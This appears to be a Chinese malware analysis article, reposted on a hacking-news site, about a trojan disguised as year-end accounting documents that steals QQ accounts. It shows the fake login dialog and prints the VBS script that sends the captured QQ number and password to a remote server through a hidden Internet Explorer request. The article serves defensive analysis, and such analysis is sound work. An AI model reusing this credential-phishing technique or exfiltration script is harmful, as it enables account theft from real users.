记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

年终对账资料盗QQ号病毒详细分析

2013-07-15 11:16
QQ即时通讯工具目前已成为网民日常生活中的一个重要组成部分,同时也成为了黑客和病毒攻击的主要目标。本文将为大家分析目前流行的盗取腾讯QQ的病毒的过程,并在此基础上描述如何防范病毒攻击事件的发生。

年底了有些人会从网上找一些资料,例如对账资料之类的,而这些资料背后实际上则是隐藏了能盗取你的QQ账号的木马,该病毒会山寨一个假的QQ登录界面,欺骗你输入的QQ密码,悄声无息地将你QQ账号盗走。本篇文章就是来揭示一下这种病毒的QQ盗号过程,让你清清楚楚明明白白知道QQ号是如何被盗走的。

病毒样本介绍

先来看一下该病毒样本的相关信息:

File: 重要资料.exe

Size: 176KB

MD5: 8DA815C87F085B0F531C8CBB7DFB1A1B

还有一个12KB大小的配置文件config.ini,详见图1:

 

图1:病毒样本重要资料

病毒简介

该病毒是一款盗QQ账号的病毒,病毒会创建一个山寨的QQ登录出错界面来欺骗用户重新登录,一旦用户上当,输入自己的QQ账号和密码,则QQ账号和密码就会被盗取,并被发送到病毒作者指定的服务器的页面。这个页面主要是盗号者自己编写的收集成功盗号的网页脚本,一般是使用asp语言编写的。下面将详细来演示一下该病毒样本是如何实施盗号的。

盗号过程分析

为了能更好的演示盗号过程,我们先申请一个QQ账号,具体申请QQ号码过程就不讲解了,我们申请的QQ号码为:1851119684,密码为:123456*。用事先申请号的QQ号码先登录上QQ,如图2所示:

图2:申请好的QQ账号

这里用到分析工具为ProcessMonitor,这款工具是微软出的,可以很好地来监视系统注册表项及文件的创建、写入等。在使用ProcessMonitor工具前,需要设置一下过滤器,过滤器主要是让ProcessMonitor监视到我们想要看到的一些的病毒行为,排除掉其他无关紧要的行为,以便更好的进行分析。

在运行病毒前,我们先开启ProcessMonitor工具的捕获,见下图3所示:

图3:开启ProcessMonitor的捕获

双击运行病毒样本重要资料.exe,运行一会儿,系统桌面弹出一个QQ出错重新登录的对话框,如图4所示:

图4:病毒山寨的重新登录QQ的对话框

大家这里可能会有疑问,你怎么知道这个是病毒山寨的QQ出错登录对话框?我们使用ProcessMonitor的抓弹窗口功能,来看一下这个对话框是由哪个系统进程弹出的。如图5所示,我们用鼠标点击十字型图标,使用拖拽将其放置到那个登录的对话框上,ProcessMonitor自动将进程名称为重要资料.exe捕获到操作内容全部列出,如图6所示。也就是说这个登录对话框是重要资料.exe创建的,并不是正常的QQ主程序QQ.exe创建的。这就印证了前面我们所说的,这个山寨的登录对话框是由病毒程序创建的。

图5:ProcessMonitor抓弹窗进程来源窗口功能

图6:ProcessMonitor抓弹功能抓到病毒程序山寨的对话框

至此,重要资料.exe只是弹出一个山寨的重新登录的对话框,但我们发现屏幕右下角之前我们登录好的QQ并没有退出,QQ托盘程序还在。如图7所示,双击一下托盘图标看能否显示出已登录的QQ主界面,双击之后界面并不显示,立马就变成了最小化。看来病毒程序应该是不断的检测查找QQ进程的类名进行匹配,然后在盗号同时把正常的QQ界面最小化,另一方面则不断地来强制定位显示山寨的QQ登录对话框在屏幕中央,这样使得正常的QQ界面无法显示、无法使用。

图7:病毒强制定位显示山寨的QQ登录对话框在屏幕中央,QQ程序未退出

接下来为了更好地演示一下该病毒样本是如何盗号,我们输入密码点登录看一下。这个QQ账号是事先申请好的,并没有开通QQ任何业务,只是用来演示。今后如遇到类似盗号的,千万不能输入自己真实的QQ账号和密码,这样你QQ账号和密码肯定会被盗走的,测试号盗走无所谓了。输入密码点击登录后,在山寨的QQ出错登录界面显示出密码错误,请重新输入。如图8所示:

图8:输入密码后提示错误

一个令人迷惑的提示,明明输入的正确QQ密码啊!当你还在质疑QQ密码没有错的时候,你的QQ账号和密码却已经被发送到的病毒作者的服务器上了。下面就来看一下病毒是如何发送你的QQ账号和密码的。

还记得我们的进程监视工具ProcessMonitor吗?我们一直都没有查看这个工具到底监视到了病毒的哪些行为。我们前面提到用进程来源窗口(抓弹窗进程)功能,抓了一下山寨的QQ出错登录窗口,ProcessMonitor自动给我们列出了所有捕获到重要资料.exe行为,实际就是设置了一个过滤规则,只是将重要资料.exe行为列出,方便我们查看都做了那些操作。这也是ProcessMonitor的一个很好用功能,可以设置过滤规则。接下来看一下ProcessMonitor抓到了什么,我们看到最初ProcessMonitor监视到的病毒行为,都是进程启动、线程创建、查询名称信息等内容,如图9所示,这些都不是我们想要的,写入文件和设置注册表键值这些是我们需要的。

图9:ProcessMonitor监视到的病毒样本行为内容

我们来看一下在输入密码后,病毒样本都有那些行为。我们可以进一步设置过滤规则操作写入文件,如图10所示,病毒样本重要资料.exe在系统临时目录下成功写入了文件。

图10:病毒在临时系统目录下写入文件

写入的是什么文件呢,我们可以双击这条记录来看一下,如图11所示,病毒在C:\Documents and Settings\rising\Local Settings\Temp\目录下写入了一个temp3982.vbs脚本。

图11:病毒写入的脚本

我们根据路径:C:\Documents and Settings\rising\Local Settings\Temp找一个这个vbs脚本。如图12所示,在C:\Documents and Settings\rising\Local Settings\Temp下找到temp3982.vbs。来看一下这个vbs脚本内容是什么。

图12:重要资料.exe写入的vbs脚本

使用记事本打开temp3982.vbs,查看一下脚本内容,如图13所示:

图13:temp3982.vbs脚本代码

将脚本内容复制出来,看一下这个脚本都干了什么。代码内容如下:

set ie=createobject("internetexplorer.application")

ie.visible=FALSE

ie.navigate("http://50.115.134.169:6565/senddata.asp?1=1851119684&2=123456*&3=hhn")

do until ie.readystate=4

loop

set ie=nothing

简单分析一下:这段代码里面有我们申请好的QQ号码,还有QQ密码,如图14所示:

图14:脚本里有QQ账号和密码

这段代码的大致意思,让IE浏览器以隐藏方式访问http://50.115.134.169:6565/senddata.asp?1=1851119684&2=123456*&3=hhn页面,将我们的QQ账号和密码以get方式发送到50.115.134.169域名的senddata.asp页面,而senddata.asp页面就是病毒作者在远端服务器上事先写好的收信页面代码。这样,在我们山寨的QQ出错界面输入密码点登录后,将我们的QQ账号和密码盗走。

vbs脚本是如何执行的呢,我们来看一下ProcessMonitor有没有监视到脚本是如何执行的。设置过滤规则进程创建,如图15所示,我们看到重要资料.exe调用系统wscript.exe来执行temp3982.vbs,如图16所示:

图15:调用wscript.exe执行脚本

图16:wscript执行脚本程序

“C:\WINDOWS\System32\WScript.exe” /B表示“不显示脚本错误及提示信息”,这样更好地隐蔽病毒盗号过程,不会轻易被发现。至此,我们完整地演示了这个样本是如何盗取QQ号码的。

小结

病毒运行后,会山寨出一个QQ出错登录界面,同时会不断隐藏正常QQ界面,使得正常QQ的界面无法使用,诱骗用户认为QQ出错,输入QQ密码重新登录。随后,病毒会调用系统wscript执行vbs脚本,使用vbs脚本发送盗取的QQ账号和密码到病毒作者的服务器上。这个病毒手动处理起来也很简单,任务管理器里结束“重要资料.exe”这个进程,并手动删除文件即可。目前,瑞星v16已可以完美查杀此病毒,如图17所示。

图17:瑞星v16完美查杀该盗QQ号病毒

知识来源: www.2cto.com/Article/201307/227784.html

阅读:68922 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“年终对账资料盗QQ号病毒详细分析”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云